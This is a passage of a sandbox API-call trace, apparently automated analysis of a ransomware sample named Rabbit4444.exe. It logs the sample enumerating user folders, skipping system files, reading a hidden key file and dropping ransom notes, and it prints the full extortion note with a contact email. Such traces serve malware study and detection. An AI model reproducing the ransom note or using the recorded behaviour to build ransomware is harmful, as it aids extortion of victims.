ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.604] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.606] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.608] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.609] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.610] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.611] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cde58 | out: lpFindFileData=0x11cde58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3f1303, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3f1303, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.611] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.616] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.616] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11cde58 | out: lpFindFileData=0x11cde58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3f1303, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3f1303, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.618] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.619] lstrcpyW (in: lpString1=0x11cea70, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.723] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0062.780] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.788] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.793] CloseHandle (hObject=0x260) returned 1 [0062.793] CloseHandle (hObject=0x27c) returned 1 [0062.793] GetCurrentThreadId () returned 0xb08 [0062.793] RtlInterlockedPopEntrySList (in: ListHead=0x122308 | out: ListHead=0x122308) returned 0x0 [0062.794] GetCurrentThreadId () returned 0xb08 [0062.794] WaitForMultipleObjects (nCount=0x0, lpHandles=0x11ce0a8*=0x0, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0xffffffff [0062.796] RtlInterlockedPopEntrySList (in: ListHead=0x122308 | out: ListHead=0x122308) returned 0x0 [0062.796] RtlInterlockedFlushSList (in: ListHead=0x122308 | out: ListHead=0x122308) returned 0x0 [0062.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0062.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xff6f8 | out: hHeap=0xe0000) returned 1 [0062.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122840 | out: hHeap=0xe0000) returned 1 [0062.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055b0 | out: hHeap=0xe0000) returned 1 [0062.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 Thread: id = 20 os_tid = 0xd1c [0066.145] RtlInterlockedPopEntrySList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x121fc8 [0066.145] lstrcpynW (in: lpString1=0x11cea20, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" [0066.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113a58 | out: hHeap=0xe0000) returned 1 [0066.145] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fc0 | out: hHeap=0xe0000) returned 1 [0066.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" [0066.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\" [0066.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0066.145] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0xffffffff [0066.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC" [0066.145] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\" [0066.146] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0066.146] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.146] ReadFile (in: hFile=0x228, lpBuffer=0x11cc608, nNumberOfBytesToRead=0x3d4, lpNumberOfBytesRead=0x11cc604, lpOverlapped=0x0 | out: lpBuffer=0x11cc608*, lpNumberOfBytesRead=0x11cc604*=0x3d4, lpOverlapped=0x0) returned 1 [0066.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0x105560 [0066.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10d1e8 [0066.146] lstrlenA (lpString="b4 JJ up So Ri VJ zb Gs aV zP xm 6E 9W Y1 vI Np\r\nr8 AZ 3V e2 /2 HZ 3m c7 jm eL tD W+ B4 uf S1 ti\r\nDt sJ m2 cw Jt Ud T8 2Z Xb FK Va Cd 1K fR kD X2\r\nwj Ht G7 BW tA mm +H YT 9R vU I5 y9 eh /F 4J GH\r\n+j x1 qZ 6+ tf 2I zQ Sh PI ei T0 Rt U2 M7 1p wT\r\n9Q VS Zp JM Ua UA Lf YT AB yP nf PD Vf 7J Lg s2\r\nmy bV QN IS Bd XQ DS OB tJ sa Hs 5K uR Nj xr sH\r\nNV pi 1D zP l9 V1 Gq 0k Cn WK Om 0Q /F fm oS 55\r\nH5 Jx Dd zc lS Lm uh 0e Qb fg FR Wl lf 0e zP m6\r\nzz On 3h I+ Ux /I cs 0D bM zU /e lR FE q5 +b 53\r\niW eW Ks Ee ZN qJ gP vb 3c 1n iv O5 y3 ih f3 z4\r\n8y aZ jq Oy +L 13 Oj qv Qr Kd hl 2g SU r3 Mv Sa\r\ntv kF TD DN 70 T/ Cv c3 h0 RE rU vo L/ 21 eN zT\r\nuc 1u J/ Op E3 Rx n9 +n Dl jh Mr +v oh xp sN EI\r\nkA YM 2F bl Vl BZ ti +J 2n pk Vb If jW 1M Ee py\r\nUU YZ 06 k/ RM FR tD DV ro Os f8 Zy Jd 7M hk 12\r\nlY bs A1 FV Ri ks fR 2b Wb 88 wL Zq WG 6v Db PN\r\nQ5 X3 LA mF mv qx 1Z mW G2 6k 3o KJ Vg qW 6M F/\r\nco JP wB ws yb zm p9 zT Ja na kx Wb xY Nc f+ Y+\r\nWJ Kj j7 sB S1 RI KH Fh OB aF +3 FZ b0 XD 4G T0\r\nGK fC Qd q5 Vo Md 4O It Nz V/ Fe Q2 51 db hm vg\r\n4t yn AS Fx QT o= ") returned 1047 [0066.146] lstrlenA (lpString="{{ID}}") returned 6 [0066.146] lstrlenA (lpString=" YOUR FILES ARE ENCRYPTED !!!\r\n\r\nTO DECRYPT, FOLLOW THE INSTRUCTIONS:\r\n\r\nTo recover data you need decrypt tool.\r\n\r\nTo get the decrypt tool you should:\r\n\r\n1.In the letter include your personal ID! Send me this ID in your first email to me!\r\n2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!\r\n3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool! \r\n4.We can decrypt few files in quality the evidence that we have the decoder.\r\n\r\n\r\n DO NOT TRY TO DO SOMETHING WITH YOUR FILES BY YOURSELF YOU WILL BRAKE YOUR DATA !!! ONLY WE ARE CAN HELP YOU! CONTACT US:\r\n\r\nChina.helper@aol.com \r\n\r\n\r\n ATTENTION !!! THIS IS YOUR PERSONAL ID WICH YOU HAVE TO SEND IN FIRST LETTER:\r\n\r\n{{ID}}\r\n") returned 827 [0066.146] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x74c) returned 0x11aba8 [0066.146] CloseHandle (hObject=0x228) returned 1 [0066.146] GetLastError () returned 0x0 [0066.146] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC") returned 73 [0066.146] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.146] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x15f8ed9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3981f155, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee99ab99, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0066.147] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.147] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.147] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.147] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.147] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x15f8ed9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3981f155, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee99ab99, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.147] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.147] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.147] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.147] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.147] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.147] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee99ab99, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee99ab99, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee99ab99, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.147] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.147] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.147] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2082fdf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x161f141, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0066.147] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0066.147] lstrcpyW (in: lpString1=0x11ceab4, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0066.147] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0066.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0066.148] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x119158 [0066.148] RtlInterlockedPushEntrySList (in: ListHead=0x122048, ListEntry=0x122288 | out: ListHead=0x122048, ListEntry=0x122288) returned 0x0 [0066.148] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2083998, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x161f141, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0066.148] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0066.148] lstrcpyW (in: lpString1=0x11ceab4, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0066.148] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0066.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0066.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x124758 [0066.149] RtlInterlockedPushEntrySList (in: ListHead=0x122048, ListEntry=0x121f88 | out: ListHead=0x122048, ListEntry=0x121f88) returned 0x122288 [0066.149] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2084468, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x161f141, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0066.149] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0066.149] lstrcpyW (in: lpString1=0x11ceab4, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0066.149] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0066.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0066.149] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x123bd8 [0066.149] RtlInterlockedPushEntrySList (in: ListHead=0x122048, ListEntry=0x122368 | out: ListHead=0x122048, ListEntry=0x122368) returned 0x121f88 [0066.149] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2084d49, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x161f141, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0066.149] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.149] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.149] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0066.149] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0066.149] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0066.150] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0066.150] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0066.150] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0066.150] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0066.150] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0066.150] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0066.150] lstrcpyW (in: lpString1=0x11ceab4, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0066.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0066.150] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x121470 [0066.150] RtlInterlockedPushEntrySList (in: ListHead=0x122048, ListEntry=0x121fe8 | out: ListHead=0x122048, ListEntry=0x121fe8) returned 0x122368 [0066.150] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x11cded0 | out: lpFindFileData=0x11cded0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x161f141, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2084d49, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x161f141, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0066.150] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0066.150] lstrcpyW (in: lpString1=0x11ceab4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.150] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.152] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.152] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.152] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.152] CloseHandle (hObject=0x27c) returned 1 [0066.152] CloseHandle (hObject=0x228) returned 1 [0066.152] GetCurrentThreadId () returned 0xd1c [0066.152] RtlInterlockedPopEntrySList (in: ListHead=0x122048 | out: ListHead=0x122048) returned 0x121fe8 [0066.152] lstrcpynW (in: lpString1=0x11cea20, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp" [0066.152] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121470 | out: hHeap=0xe0000) returned 1 [0066.152] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fe0 | out: hHeap=0xe0000) returned 1 [0066.153] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp" [0066.153] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\" [0066.153] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") 